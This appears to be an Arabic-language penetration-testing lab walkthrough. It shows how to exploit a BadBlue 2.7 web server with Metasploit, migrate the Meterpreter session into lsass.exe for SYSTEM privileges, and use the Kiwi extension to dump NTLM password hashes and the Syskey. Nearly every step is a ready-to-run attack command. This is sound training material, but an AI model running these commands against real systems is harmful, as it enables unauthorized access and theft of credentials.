search

🧪 المختبر 12: استخراج تجزئات كلمات مرور NTLM ومفتاح Syskey على Windows (باستخدام Kiwi)

🎯 الهدف الأساسي: استخراج تجزئات كلمات مرور NTLM ومفتاح Syskey من نظام Windows باستخدام إضافة Kiwi لـ Meterpreter.

🔧 الأدوات المستخدمة: nmap, msfconsole, exploit/windows/misc getuid, ps, migrate, load kiwi, creds_all, lsa_dump_sam, lsa_dump_secrets`.

📜 خطوات التنفيذ:

📊 منهجية اختبار الاختراق: الاستطلاع، الفحص، الاستغلال، ما بعد الاستغلال (استخراج الهاشات والمفاتيح)

  1. الفحص واكتشاف الثغرات:

    • قم بإجراء فحص Nmap على الهدف لتحديد الخدمات المفتوحة وإصداراتها.

    • الأمر:

      nmap -sV -p 80 <Target_IP>

    • الشرح: ستجد خادم BadBlue يعمل على المنفذ 80 (عادةً إصدار 2.7).

    • الأمر الأساسي: (داخل msfconsole)

      search badblue

    • الشرح: إذا بحثت، ستجد وحدة استغلال لخدمة BadBlue.

  2. الحصول على الوصول الأولي (جلسة Meterpreter):

    • ابدأ خدمة قاعدة بيانات PostgreSQL ثم قم بتشغيل Metasploit Console.

    • الأمر:

      msfconsole -q
use exploit/windows/misc/badblue_passthru_overflow
set RHOSTS <Target_IP>
exploit

    • الشرح: إذا نفذت هذه الأوامر، ستحصل على جلسة Meterpreter أولية على الهدف.

    • الأمر الأساسي: (داخل جلسة Meterpreter)

      getuid

    • الشرح: ستعرض لك الوحدة اسم المستخدم الحالي (مثلاً Administrator).

  3. ترحيل جلسة Meterpreter ورفع الامتيازات:

    • قم بترحيل جلسة Meterpreter إلى عملية lsass.exe للحصول على امتيازات NT AUTHORITY\SYSTEM.

    • الأمر: (داخل جلسة Meterpreter)

      ps
migrate -n lsass.exe

    • الشرح: فسيتم ترحيل جلسة Meterpreter إلى عملية lsass.exe، مما يمنحك امتيازات NT AUTHORITY\SYSTEM.

    • الأمر:

      getuid

    • الشرح:ستؤكد أنك بامتيازات NT AUTHORITY\SYSTEM.

  4. استخراج تجزئات كلمات المرور ومفتاح Syskey باستخدام Kiwi:

    • قم بتحميل إضافة Kiwi.

    • الأمر: (داخل جلسة Meterpreter)

      load kiwi

    • الشرح: سيتم تحميل إضافة Kiwi.

    • استخراج تجزئات NTLM:

    • الأمر الأساسي: (داخل جلسة Meterpreter)

      creds_all

    • الشرح: ستقوم Kiwi باستخراج تجزئات كلمات مرور NTLM لجميع المستخدمين (مثل Administrator و student).

    • استخراج مفتاح Syskey:

    • الأمر الأساسي: (داخل جلسة Meterpreter)

      lsa_dump_secrets

    • الشرح: ستقوم Kiwi باستخراج مفتاح Syskey.

Previous🧪 المختبر 11: البحث عن كلمات المرور في ملفات تكوين Windows غير المراقبة ورفع الامتيازاتNext🧪 المختبر 13: استغلال SMB/PSExec على Windows (باستخدام Metasploit)

Last updated